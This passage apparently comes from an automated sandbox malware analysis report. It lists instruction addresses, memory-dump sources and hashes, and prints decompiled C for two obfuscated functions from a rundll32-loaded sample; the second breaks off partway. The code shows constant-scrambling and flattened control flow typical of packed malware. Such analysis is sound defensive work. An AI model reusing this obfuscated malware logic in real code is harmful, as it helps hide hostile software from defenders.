                                                                                                                      0x0035a875
                                                                                                                      0x0035a880
                                                                                                                      0x0035a88f
                                                                                                                      0x0035a892
                                                                                                                      0x0035a896
                                                                                                                      0x0035a89e
                                                                                                                      0x0035a8a6
                                                                                                                      0x0035a8ae
                                                                                                                      0x0035a8c4
                                                                                                                      0x0035a8cb
                                                                                                                      0x0035a8d6
                                                                                                                      0x0035a8e3
                                                                                                                      0x0035a8e6
                                                                                                                      0x0035a8f2
                                                                                                                      0x0035a8fa
                                                                                                                      0x0035a8ff
                                                                                                                      0x0035a903
                                                                                                                      0x0035a90b
                                                                                                                      0x0035a91e
                                                                                                                      0x0035a925
                                                                                                                      0x0035a930
                                                                                                                      0x0035a938
                                                                                                                      0x0035a93d
                                                                                                                      0x0035a945
                                                                                                                      0x0035a94d
                                                                                                                      0x0035a955
                                                                                                                      0x0035a95d
                                                                                                                      0x0035a965
                                                                                                                      0x0035a96d
                                                                                                                      0x0035a97b
                                                                                                                      0x0035a97f
                                                                                                                      0x0035a984
                                                                                                                      0x0035a98c
                                                                                                                      0x0035a994
                                                                                                                      0x0035a99c
                                                                                                                      0x0035a9a4
                                                                                                                      0x0035a9a9
                                                                                                                      0x0035a9b1
                                                                                                                      0x0035a9b9
                                                                                                                      0x0035a9c4
                                                                                                                      0x0035a9cc
                                                                                                                      0x0035a9d7
                                                                                                                      0x0035a9e2
                                                                                                                      0x0035a9ed
                                                                                                                      0x0035a9f8
                                                                                                                      0x0035aa00
                                                                                                                      0x0035aa0d
                                                                                                                      0x0035aa16
                                                                                                                      0x0035aa20
                                                                                                                      0x0035aa28
                                                                                                                      0x0035aa33
                                                                                                                      0x0035aa3e
                                                                                                                      0x0035aa49
                                                                                                                      0x0035aa51
                                                                                                                      0x0035aa59
                                                                                                                      0x0035aa5e
                                                                                                                      0x0035aa66
                                                                                                                      0x0035aa79
                                                                                                                      0x0035aa80
                                                                                                                      0x0035aa8b
                                                                                                                      0x0035aa93
                                                                                                                      0x0035aa9b
                                                                                                                      0x0035aaa3
                                                                                                                      0x0035aaab
                                                                                                                      0x0035aab3
                                                                                                                      0x0035aab8
                                                                                                                      0x0035aabc
                                                                                                                      0x0035aac4
                                                                                                                      0x0035aac9
                                                                                                                      0x0035aad1
                                                                                                                      0x0035aadf
                                                                                                                      0x0035abe3
                                                                                                                      0x00000000
                                                                                                                      0x0035aae5
                                                                                                                      0x0035aae5
                                                                                                                      0x0035aae7
                                                                                                                      0x0035acbc
                                                                                                                      0x0035acbc
                                                                                                                      0x0035acc2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035aaed
                                                                                                                      0x0035ab01
                                                                                                                      0x0035ab34
                                                                                                                      0x0035ab3b
                                                                                                                      0x0035ab40
                                                                                                                      0x0035ab44
                                                                                                                      0x0035ab56
                                                                                                                      0x0035ab9c
                                                                                                                      0x0035abb7
                                                                                                                      0x0035abc0
                                                                                                                      0x0035abcc
                                                                                                                      0x0035abd1
                                                                                                                      0x0035abd6
                                                                                                                      0x0035abdc
                                                                                                                      0x00000000
                                                                                                                      0x0035abdc
                                                                                                                      0x0035abd6
                                                                                                                      0x0035aae7
                                                                                                                      0x0035acd2
                                                                                                                      0x0035acd2
                                                                                                                      0x0035abea
                                                                                                                      0x0035ac0a
                                                                                                                      0x0035ac0f
                                                                                                                      0x0035ac13
                                                                                                                      0x0035ac25
                                                                                                                      0x0035ac65
                                                                                                                      0x0035ac76
                                                                                                                      0x0035ac7d
                                                                                                                      0x0035ac85
                                                                                                                      0x0035ac87
                                                                                                                      0x0035ac8b
                                                                                                                      0x0035ac8f
                                                                                                                      0x0035ac96
                                                                                                                      0x0035ac97
                                                                                                                      0x0035ac98
                                                                                                                      0x0035aca6
                                                                                                                      0x0035aca7
                                                                                                                      0x0035aca8
                                                                                                                      0x0035acaf
                                                                                                                      0x0035acb4
                                                                                                                      0x0035acb7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7h$;:$E%$FCEF$Xth$8$x
                                                                                                                      • API String ID: 0-4119786196
                                                                                                                      • Opcode ID: d808081b3974fde06fd30182d37cf51214d85f33917308e18180cc4e50e553a1
                                                                                                                      • Instruction ID: a1dc2546acd4b1ffa51f78724bd042b284373b07666d885dfeef9edca5859eff
                                                                                                                      • Opcode Fuzzy Hash: d808081b3974fde06fd30182d37cf51214d85f33917308e18180cc4e50e553a1
                                                                                                                      • Instruction Fuzzy Hash: 95221171508381DFD369CF25C54AA8BFBE2BBC4708F108A1DE6D98A261D7B19949DF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00360D5B Relevance: 9.0, Strings: 7, Instructions: 286COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00360D5B() {
				void* _t279;
				signed char _t284;
				intOrPtr _t294;
				signed int _t296;
				signed int _t302;
				signed char _t309;
				intOrPtr _t310;
				void* _t311;
				signed short _t340;
				signed int _t341;
				intOrPtr _t342;
				signed int _t346;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed short* _t359;
				void* _t361;

				 *(_t361 + 0x80) =  *(_t361 + 0x80) & 0x00000000;
				 *(_t361 + 0x74) = 0x716487;
				_t302 = 0x4e9f10f;
				 *(_t361 + 0x78) = 0xba6397;
				 *(_t361 + 0x7c) = 0x705fb8;
				 *(_t361 + 0x68) = 0x4c092e;
				_t7 = _t361 + 0x68; // 0x4c092e
				_t349 = 5;
				 *(_t361 + 0x7c) =  *_t7 / _t349;
				 *(_t361 + 0x7c) =  *(_t361 + 0x7c) ^ 0x0003a2ba;
				 *(_t361 + 0x64) = 0x751de4;
				 *(_t361 + 0x64) =  *(_t361 + 0x64) + 0xffff6a51;
				 *(_t361 + 0x64) =  *(_t361 + 0x64) ^ 0x007ee7f9;
				 *(_t361 + 0x44) = 0x9fd9a3;
				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 6;
				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 4;
				 *(_t361 + 0x44) =  *(_t361 + 0x44) ^ 0x7f6c4ffb;
				 *(_t361 + 0x28) = 0x22a0e;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) >> 0xb;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) + 0x788;
				_t350 = 0x41;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) * 0x62;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) ^ 0x000a9bb9;
				 *(_t361 + 0x20) = 0xda6f7f;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 0x62;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 7;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) << 0xa;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) ^ 0x5b1b1cce;
				 *(_t361 + 0x74) = 0x2b9064;
				 *(_t361 + 0x74) =  *(_t361 + 0x74) + 0x7c5a;
				 *(_t361 + 0x74) =  *(_t361 + 0x74) ^ 0x002a32d7;
				 *(_t361 + 0x5c) = 0xcbc6c3;
				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) * 0x12;
				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) ^ 0x0e5c6d3d;
				 *(_t361 + 0x40) = 0xfaf28f;
				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x36c89793;
				 *(_t361 + 0x40) =  *(_t361 + 0x40) | 0x5dfe35bf;
				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x7ff1266d;
				 *(_t361 + 0x3c) = 0x71501;
				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7d526c09;
				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) | 0x29ca113d;
				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7dd950c2;
				 *(_t361 + 0x78) = 0x2c4b29;
				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa68b4193;
				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa6a148a4;
				 *(_t361 + 0x50) = 0xa9eb43;
				 *(_t361 + 0x50) =  *(_t361 + 0x50) << 4;
				 *(_t361 + 0x50) =  *(_t361 + 0x50) ^ 0x0a966e12;
				 *(_t361 + 0x24) = 0xf29fdf;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) / _t350;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) | 0x702811c1;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0xfde5eea1;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0x8dc07913;
				 *(_t361 + 0x48) = 0x26e009;
				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xd6899262;
				 *(_t361 + 0x48) =  *(_t361 + 0x48) << 1;
				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xad52b6d6;
				 *(_t361 + 0x1c) = 0xb261a6;
				 *(_t361 + 0x1c) =  *(_t361 + 0x1c) + 0x753a;
				_t351 = 0x3f;
				 *(_t361 + 0x18) =  *(_t361 + 0x1c) / _t351;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xffffc68f;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x00055965;
				 *(_t361 + 0x10) = 0xb29e6;
				 *(_t361 + 0x10) =  *(_t361 + 0x10) ^ 0xf1ef7176;
				_t352 = 0x53;
				_t346 =  *(_t361 + 0x80);
				 *(_t361 + 0x14) =  *(_t361 + 0x10) * 0x52;
				 *(_t361 + 0x14) =  *(_t361 + 0x14) + 0xffff3d5f;
				 *(_t361 + 0x14) =  *(_t361 + 0x14) ^ 0x7b287ee9;
				 *(_t361 + 0x6c) = 0xc2349f;
				_t359 =  *(_t361 + 0x80);
				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) * 0x2b;
				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) ^ 0x209b01de;
				 *(_t361 + 0x30) = 0xecc1f5;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x10955a53;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) | 0x79713791;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) / _t352;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x017289e0;
				 *(_t361 + 0x58) = 0x8daaf;
				_t353 = 0xe;
				 *(_t361 + 0x58) =  *(_t361 + 0x58) / _t353;
				 *(_t361 + 0x58) =  *(_t361 + 0x58) ^ 0x00025281;
				 *(_t361 + 0x54) = 0x82784e;
				 *(_t361 + 0x54) =  *(_t361 + 0x54) | 0x1fcf3d57;
				 *(_t361 + 0x54) =  *(_t361 + 0x54) ^ 0x1fc5386b;
				 *(_t361 + 0x2c) = 0xdcbbf5;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 0xa;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 2;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) + 0xffff64c3;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) ^ 0xfffe0972;
				 *(_t361 + 0x70) = 0xf032c2;
				 *(_t361 + 0x70) =  *(_t361 + 0x70) + 0xffff1f36;
				 *(_t361 + 0x70) =  *(_t361 + 0x70) ^ 0x00e5c56e;
				 *(_t361 + 0x38) = 0xb1df5b;
				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xe;
				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xa;
				 *(_t361 + 0x38) =  *(_t361 + 0x38) ^ 0x5b06c733;
				 *(_t361 + 0x18) = 0x22b4d7;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x9a622f3f;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xcb3c;
				_t354 = 0x1f;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) / _t354;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x04f5d5b3;
				 *(_t361 + 0x34) = 0xa6176b;
				_t355 = 0x3b;
				 *(_t361 + 0x30) =  *(_t361 + 0x34) / _t355;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) >> 0xb;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) + 0xffffd9a6;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0xfffb162a;
				while(1) {
					L1:
					L2:
					while(1) {
						while(_t302 != 0xb6d0a5) {
							if(_t302 == 0x1c75f00) {
								_push(_t302);
								_push(_t302);
								_t311 = 0x68;
								_t359 = E00353512(_t311);
								__eflags = _t359;
								if(__eflags != 0) {
									_t302 = 0xb6d0a5;
									goto L17;
								}
							} else {
								if(_t302 == 0x4e9f10f) {
									_t342 =  *0x365214; // 0x0
									_t302 = 0x8016e2b;
									_t341 = _t342 + 4;
									goto L12;
								} else {
									if(_t302 == 0x6570a92) {
										_t294 =  *0x365214; // 0x0
										_t302 = 0xe9e8905;
										 *_t341 = _t359;
										_t212 =  &(_t359[0x2c]); // 0x58
										_t341 = _t212;
										_t213 = _t294 + 0x44;
										 *_t213 =  *(_t294 + 0x44) + 1;
										__eflags =  *_t213;
										L12:
										 *(_t361 + 0x5c) = _t341;
										goto L13;
									} else {
										if(_t302 == 0x8016e2b) {
											_t296 = E0035EAE6(0x365000,  *((intOrPtr*)(_t361 + 0x88)), __eflags,  *(_t361 + 0x6c),  *(_t361 + 0x48), _t361 + 0x84,  *(_t361 + 0x24));
											_t361 = _t361 + 0x10;
											 *(_t361 + 0x7c) = _t296;
											_t346 = _t296;
											_t302 = 0x1c75f00;
											 *(_t361 + 0x64) = _t296 +  *(_t361 + 0x80);
											goto L1;
										} else {
											if(_t302 == 0x8020f8f) {
												E003468DE( *(_t361 + 0x78),  *(_t361 + 0x40),  *(_t361 + 0x1c),  *(_t361 + 0x34),  *(_t361 + 0x7c));
											} else {
												if(_t302 != 0xe9e8905) {
													L19:
													__eflags = _t302 - 0x718ec4e;
													if(__eflags != 0) {
														L17:
														_t341 =  *(_t361 + 0x5c);
														L13:
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t302 = (_t302 & 0xf9c54f71) + 0x8020f8f;
													continue;
												}
											}
										}
									}
								}
							}
							_t310 =  *0x365214; // 0x0
							 *(_t310 + 0x38) =  *(_t310 + 0x38) & 0x00000000;
							 *((intOrPtr*)(_t310 + 0x3c)) =  *((intOrPtr*)(_t310 + 4));
							__eflags = 1;
							return 1;
						}
						_push( *((intOrPtr*)(_t361 + 0x4c)));
						_push( *(_t361 + 0x78));
						 *((char*)(_t361 + 0x53)) =  *((intOrPtr*)(_t346 + 1));
						_push(0x34134c);
						 *(_t361 + 0x56) =  *((intOrPtr*)(_t346 + 2));
						_t279 = E0034AB66( *(_t361 + 0x44),  *(_t361 + 0x40), __eflags);
						_t231 =  &(_t359[0x10]); // 0x20
						_push(_t279);
						E0035BDB5(_t231, __eflags, 0x10,  *(_t361 + 0x54),  *(_t361 + 0x74),  *(_t361 + 0x44),  *(_t361 + 0x38),  *(_t361 + 0x56) & 0x000000ff,  *((intOrPtr*)(_t361 + 0x88)),  *(_t361 + 0x48),  *(_t361 + 0x63) & 0x000000ff,  *(_t346 + 3) & 0x000000ff,  *(_t346 + 3) & 0x000000ff);
						E0034AE03( *((intOrPtr*)(_t361 + 0x94)),  *((intOrPtr*)(_t361 + 0x90)),  *(_t361 + 0x64), _t279);
						_t361 = _t361 + 0x40;
						 *_t359 = ( *(_t346 + 4) & 0x000000ff) << 0x00000008 |  *(_t346 + 5) & 0x000000ff;
						_t284 =  *((intOrPtr*)(_t346 + 6));
						_t309 =  *((intOrPtr*)(_t346 + 7));
						_t346 = _t346 + 8;
						_t302 = 0x6570a92;
						_t340 = (_t284 & 0x000000ff) << 0x00000008 | _t309 & 0x000000ff;
						__eflags = _t340;
						_t359[0x28] = _t340;
						goto L19;
					}
				}
			}
























                                                                                                                      0x00360d61
                                                                                                                      0x00360d6b
                                                                                                                      0x00360d73
                                                                                                                      0x00360d78
                                                                                                                      0x00360d80
                                                                                                                      0x00360d88
                                                                                                                      0x00360d90
                                                                                                                      0x00360d9a
                                                                                                                      0x00360d9f
                                                                                                                      0x00360da5
                                                                                                                      0x00360dad
                                                                                                                      0x00360db5
                                                                                                                      0x00360dbd
                                                                                                                      0x00360dc5
                                                                                                                      0x00360dcd
                                                                                                                      0x00360dd2
                                                                                                                      0x00360dd7
                                                                                                                      0x00360ddf
                                                                                                                      0x00360de7
                                                                                                                      0x00360dec
                                                                                                                      0x00360df9
                                                                                                                      0x00360dfc
                                                                                                                      0x00360e00
                                                                                                                      0x00360e08
                                                                                                                      0x00360e15
                                                                                                                      0x00360e1e
                                                                                                                      0x00360e22
                                                                                                                      0x00360e27
                                                                                                                      0x00360e2f
                                                                                                                      0x00360e37
                                                                                                                      0x00360e3f
                                                                                                                      0x00360e47
                                                                                                                      0x00360e54
                                                                                                                      0x00360e58
                                                                                                                      0x00360e60
                                                                                                                      0x00360e68
                                                                                                                      0x00360e70
                                                                                                                      0x00360e78
                                                                                                                      0x00360e80
                                                                                                                      0x00360e88
                                                                                                                      0x00360e90
                                                                                                                      0x00360e98
                                                                                                                      0x00360ea0
                                                                                                                      0x00360ea8
                                                                                                                      0x00360eb0
                                                                                                                      0x00360eb8
                                                                                                                      0x00360ec0
                                                                                                                      0x00360ec5
                                                                                                                      0x00360ecd
                                                                                                                      0x00360edd
                                                                                                                      0x00360ee1
                                                                                                                      0x00360ee9
                                                                                                                      0x00360ef1
                                                                                                                      0x00360ef9
                                                                                                                      0x00360f01
                                                                                                                      0x00360f09
                                                                                                                      0x00360f0d
                                                                                                                      0x00360f15
                                                                                                                      0x00360f1d
                                                                                                                      0x00360f29
                                                                                                                      0x00360f2c
                                                                                                                      0x00360f30
                                                                                                                      0x00360f38
                                                                                                                      0x00360f42
                                                                                                                      0x00360f4a
                                                                                                                      0x00360f59
                                                                                                                      0x00360f5c
                                                                                                                      0x00360f63
                                                                                                                      0x00360f67
                                                                                                                      0x00360f6f
                                                                                                                      0x00360f77
                                                                                                                      0x00360f84
                                                                                                                      0x00360f8b
                                                                                                                      0x00360f8f
                                                                                                                      0x00360f97
                                                                                                                      0x00360f9f
                                                                                                                      0x00360fa7
                                                                                                                      0x00360fb7
                                                                                                                      0x00360fbb
                                                                                                                      0x00360fc3
                                                                                                                      0x00360fcf
                                                                                                                      0x00360fd4
                                                                                                                      0x00360fda
                                                                                                                      0x00360fe2
                                                                                                                      0x00360fea
                                                                                                                      0x00360ff2
                                                                                                                      0x00360ffa
                                                                                                                      0x00361002
                                                                                                                      0x00361007
                                                                                                                      0x0036100c
                                                                                                                      0x00361014
                                                                                                                      0x0036101c
                                                                                                                      0x00361024
                                                                                                                      0x0036102c
                                                                                                                      0x00361034
                                                                                                                      0x0036103c
                                                                                                                      0x00361041
                                                                                                                      0x00361046
                                                                                                                      0x0036104e
                                                                                                                      0x00361056
                                                                                                                      0x0036105e
                                                                                                                      0x0036106a
                                                                                                                      0x0036106f
                                                                                                                      0x00361075
                                                                                                                      0x0036107d
                                                                                                                      0x00361089
                                                                                                                      0x0036108c
                                                                                                                      0x00361090
                                                                                                                      0x00361095
                                                                                                                      0x0036109d
                                                                                                                      0x003610a9
                                                                                                                      0x003610a9
                                                                                                                      0x00000000
                                                                                                                      0x003610ad
                                                                                                                      0x003610ad
                                                                                                                      0x003610bf
                                                                                                                      0x00361189
                                                                                                                      0x0036118a
                                                                                                                      0x0036118d
                                                                                                                      0x00361193
                                                                                                                      0x00361197
                                                                                                                      0x00361199
                                                                                                                      0x0036119f
                                                                                                                      0x00000000
                                                                                                                      0x0036119f
                                                                                                                      0x003610c5
                                                                                                                      0x003610cb
                                                                                                                      0x0036116d
                                                                                                                      0x00361173
                                                                                                                      0x00361178
                                                                                                                      0x00000000
                                                                                                                      0x003610d1
                                                                                                                      0x003610d7
                                                                                                                      0x0036114e
                                                                                                                      0x00361153
                                                                                                                      0x00361158
                                                                                                                      0x0036115a
                                                                                                                      0x0036115a
                                                                                                                      0x0036115d
                                                                                                                      0x0036115d
                                                                                                                      0x0036115d
                                                                                                                      0x00361160
                                                                                                                      0x00361160
                                                                                                                      0x00000000
                                                                                                                      0x003610d9
                                                                                                                      0x003610df
                                                                                                                      0x0036112b
                                                                                                                      0x00361130
                                                                                                                      0x00361133
                                                                                                                      0x00361137
                                                                                                                      0x00361139
                                                                                                                      0x00361145
                                                                                                                      0x00000000
                                                                                                                      0x003610e1
                                                                                                                      0x003610e7
                                                                                                                      0x00361282
                                                                                                                      0x003610ed
                                                                                                                      0x003610f3
                                                                                                                      0x00361261
                                                                                                                      0x00361261
                                                                                                                      0x00361267
                                                                                                                      0x003611a4
                                                                                                                      0x003611a4
                                                                                                                      0x00361164
                                                                                                                      0x00000000
                                                                                                                      0x00361164
                                                                                                                      0x003610f9
                                                                                                                      0x003610fb
                                                                                                                      0x00361103
                                                                                                                      0x00000000
                                                                                                                      0x00361103
                                                                                                                      0x003610f3
                                                                                                                      0x003610e7
                                                                                                                      0x003610df
                                                                                                                      0x003610d7
                                                                                                                      0x003610cb
                                                                                                                      0x0036128a
                                                                                                                      0x00361296
                                                                                                                      0x0036129a
                                                                                                                      0x0036129f
                                                                                                                      0x003612a7
                                                                                                                      0x003612a7
                                                                                                                      0x003611aa
                                                                                                                      0x003611b1
                                                                                                                      0x003611c2
                                                                                                                      0x003611c9
                                                                                                                      0x003611ce
                                                                                                                      0x003611d2
                                                                                                                      0x003611e1
                                                                                                                      0x003611e4
                                                                                                                      0x0036120f
                                                                                                                      0x00361227
                                                                                                                      0x00361230
                                                                                                                      0x0036123e
                                                                                                                      0x00361242
                                                                                                                      0x00361245
                                                                                                                      0x00361248
                                                                                                                      0x00361251
                                                                                                                      0x0036125a
                                                                                                                      0x0036125a
                                                                                                                      0x0036125d
                                                                                                                      0x00000000
                                                                                                                      0x0036125d
                                                                                                                      0x003610ad

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: lR}$&$)K,$.L$:u$Z|$~({
                                                                                                                      • API String ID: 0-3122078039
                                                                                                                      • Opcode ID: 170ee65f4595ece3f5cd06dad97d0857b2804cf188358f00603d2c99cd863379
                                                                                                                      • Instruction ID: 1c4f9dfc1fca1f658367a3eb71702f5a9b86e5a9525dbdc59b2918d0695f24ed
                                                                                                                      • Opcode Fuzzy Hash: 170ee65f4595ece3f5cd06dad97d0857b2804cf188358f00603d2c99cd863379
                                                                                                                      • Instruction Fuzzy Hash: DCD14FB15083808FC369CF65C48995BBBE1FBC5748F148A1DF6D68A260D3B5D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0036146E Relevance: 9.0, Strings: 7, Instructions: 241COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0036146E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				unsigned int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t243;
				void* _t248;
				void* _t253;
				void* _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t298;
				void* _t299;
				signed int* _t301;
				void* _t309;

				_t301 =  &_v104;
				_v4 = 0xac6d1;
				_v4 = _v4 | 0x81c51043;
				_v4 = _v4 ^ 0x81ca09c2;
				_v8 = 0xb8d74f;
				_v8 = _v8 | 0x3a2284f4;
				_v8 = _v8 ^ 0x3ab94f49;
				_v12 = 0x56dc2c;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x0005485d;
				_v20 = 0x903a48;
				_v20 = _v20 ^ 0xb2572448;
				_v20 = _v20 ^ 0xb2cdfeb2;
				_v24 = 0x1df316;
				_v24 = _v24 * 0x26;
				_t271 = __ecx;
				_v24 = _v24 ^ 0x04774828;
				_t298 = 0;
				_v96 = 0x29fbe6;
				_t299 = 0x412d246;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0x40e6;
				_v96 = _v96 + 0xf8d0;
				_v96 = _v96 ^ 0x3f79ed75;
				_v28 = 0x5f5eb9;
				_v28 = _v28 ^ 0x304beccc;
				_v28 = _v28 ^ 0x301ae6f7;
				_v16 = 0x707b25;
				_v16 = _v16 | 0xc66cf16b;
				_v16 = _v16 ^ 0xc674099c;
				_v68 = 0x422c76;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x51e03a27;
				_v68 = _v68 ^ 0x51e925f4;
				_v72 = 0x838679;
				_t273 = 0x50;
				_v72 = _v72 / _t273;
				_t274 = 0xb;
				_v72 = _v72 / _t274;
				_v72 = _v72 ^ 0x0007ebfd;
				_v92 = 0x3398da;
				_t275 = 0x26;
				_v92 = _v92 * 0x6d;
				_v92 = _v92 ^ 0x75ca49c7;
				_v92 = _v92 << 6;
				_v92 = _v92 ^ 0x0c9e0967;
				_v48 = 0x734a11;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x00076871;
				_v52 = 0xdc5b30;
				_v52 = _v52 ^ 0x2a73247b;
				_v52 = _v52 ^ 0x2aa1f0d2;
				_v104 = 0x2f7cf6;
				_v104 = _v104 / _t275;
				_v104 = _v104 * 0x41;
				_v104 = _v104 | 0xaae37d31;
				_v104 = _v104 ^ 0xaaffffad;
				_v56 = 0xefab9e;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x0008ac09;
				_v80 = 0xd17701;
				_t276 = 0x57;
				_v80 = _v80 / _t276;
				_v80 = _v80 + 0xffff6938;
				_v80 = _v80 ^ 0x000bb913;
				_v44 = 0x9eed53;
				_t277 = 0x32;
				_v44 = _v44 * 0x74;
				_v44 = _v44 ^ 0x480bdaeb;
				_v100 = 0xb1cacc;
				_v100 = _v100 ^ 0xb6415150;
				_v100 = _v100 / _t277;
				_t278 = 0x13;
				_v100 = _v100 * 0x1c;
				_v100 = _v100 ^ 0x667becf7;
				_v84 = 0x7272f5;
				_v84 = _v84 | 0x49285dda;
				_v84 = _v84 / _t278;
				_v84 = _v84 ^ 0x03db0e7b;
				_v32 = 0x23e0bb;
				_v32 = _v32 ^ 0xc1a40ef0;
				_v32 = _v32 ^ 0xc18ab8c7;
				_v36 = 0x934e6;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x000f952f;
				_v76 = 0x57f010;
				_t279 = 0x55;
				_v76 = _v76 / _t279;
				_v76 = _v76 | 0x3f39553c;
				_v76 = _v76 ^ 0x3f3ef260;
				_v40 = 0x93d6f8;
				_v40 = _v40 >> 6;
				_v40 = _v40 ^ 0x000a0563;
				_v60 = 0x62e666;
				_v60 = _v60 ^ 0x6bd8a41b;
				_v60 = _v60 * 0x61;
				_v60 = _v60 ^ 0xd19d18b1;
				_v88 = 0xe2190a;
				_v88 = _v88 * 0x56;
				_v88 = _v88 << 0x10;
				_v88 = _v88 * 0x2c;
				_v88 = _v88 ^ 0x1bd8b0be;
				_v64 = 0x7df3ba;
				_v64 = _v64 >> 3;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x0fbc3045;
				goto L1;
				do {
					while(1) {
						L1:
						_t309 = _t299 - 0x5b9992e;
						if(_t309 > 0) {
							break;
						}
						if(_t309 == 0) {
							_t253 = E0035274F();
							_t301 = _t301 - 0xc + 0xc;
							_t299 = 0x4369ff;
							_t298 = _t298 + _t253;
							continue;
						} else {
							if(_t299 == 0x4369ff) {
								_t298 = _t298 + E0034B782(_t271 + 0x1c, _v60, _v88, _v64);
							} else {
								if(_t299 == 0x240c704) {
									_t260 = E0035274F();
									_t301 = _t301 - 0xc + 0xc;
									_t299 = 0x5b9992e;
									_t298 = _t298 + _t260;
									continue;
								} else {
									if(_t299 == 0x412d246) {
										_t299 = 0x80cf0f0;
										continue;
									} else {
										if(_t299 != 0x47dcd1e) {
											goto L17;
										} else {
											_t265 = E0035274F();
											_t301 = _t301 - 0xc + 0xc;
											_t299 = 0x240c704;
											_t298 = _t298 + _t265;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t298;
					}
